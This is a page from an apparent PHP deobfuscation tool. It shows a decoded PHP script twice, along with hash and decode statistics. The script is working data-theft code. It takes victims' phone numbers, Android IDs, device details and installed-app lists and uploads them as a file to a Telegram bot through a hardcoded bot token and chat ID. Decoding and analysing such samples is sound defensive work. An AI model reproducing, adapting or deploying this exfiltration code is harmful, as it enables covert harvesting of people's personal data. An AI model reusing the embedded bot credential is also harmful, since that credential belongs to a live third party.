Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $j0='6916228617:AAGyRvUtxav8wesEId4tMIzBiTlCqKynwRM';$j1='6860390268';$f2=$_POST['ph..
Decoded Output download
<?php $j0='6916228617:AAGyRvUtxav8wesEId4tMIzBiTlCqKynwRM';$j1='6860390268';$f2=$_POST['phoneNumber']?? '';$e3=$_POST['deviceInfo']?? '';$e4=$_POST['androidId']?? '';$m5=$_POST['countryCode']?? '';$c6=$_POST['appInfo']?? '';$f7=preg_match('/Android Version: ([^,]+)/',$e3,$q8)?trim($q8[1]):'Unknown';preg_match('/Manufacturer: ([^,]+), Model: ([^,]+)/',$e3,$q9);$r10=trim($q9[1]?? 'Unknown');$i11=trim($q9[2]?? 'Unknown');$h12="Phone Number: $m5 $f2
"."Device Info: $e3
"."Android ID: $e4
"."App Info:
$c6
";$t13=uniqid('',true);$j14="$r10 $i11 $f7 AppsList $t13.txt";file_put_contents($j14,$h12);$v15="https://api.telegram.org/bot$j0/sendDocument";$m16=['chat_id'=>$j1,'document'=>new CURLFile(realpath($j14)),'caption'=>'App List and Phone Number Received',];$j17=curl_init($v15);curl_setopt($j17,CURLOPT_POST,1);curl_setopt($j17,CURLOPT_POSTFIELDS,$m16);curl_setopt($j17,CURLOPT_RETURNTRANSFER,true);$g18=curl_exec($j17);curl_close($j17);echo "Data received and sent to Telegram as a text file successfully!";unlink($j14);?>
Did this file decode correctly?
Original Code
<?php $j0='6916228617:AAGyRvUtxav8wesEId4tMIzBiTlCqKynwRM';$j1='6860390268';$f2=$_POST['phoneNumber']?? '';$e3=$_POST['deviceInfo']?? '';$e4=$_POST['androidId']?? '';$m5=$_POST['countryCode']?? '';$c6=$_POST['appInfo']?? '';$f7=preg_match('/Android Version: ([^,]+)/',$e3,$q8)?trim($q8[1]):'Unknown';preg_match('/Manufacturer: ([^,]+), Model: ([^,]+)/',$e3,$q9);$r10=trim($q9[1]?? 'Unknown');$i11=trim($q9[2]?? 'Unknown');$h12="Phone Number: $m5 $f2\n"."Device Info: $e3\n"."Android ID: $e4\n\n"."App Info:\n$c6\n";$t13=uniqid('',true);$j14="$r10 $i11 $f7 AppsList $t13.txt";file_put_contents($j14,$h12);$v15="https://api.telegram.org/bot$j0/sendDocument";$m16=['chat_id'=>$j1,'document'=>new CURLFile(realpath($j14)),'caption'=>'App List and Phone Number Received',];$j17=curl_init($v15);curl_setopt($j17,CURLOPT_POST,1);curl_setopt($j17,CURLOPT_POSTFIELDS,$m16);curl_setopt($j17,CURLOPT_RETURNTRANSFER,true);$g18=curl_exec($j17);curl_close($j17);echo "Data received and sent to Telegram as a text file successfully!";unlink($j14);?>
Function Calls
None |
Stats
MD5 | 21fbdcd8e504319cfe81715ad8b63657 |
Eval Count | 0 |
Decode Time | 34 ms |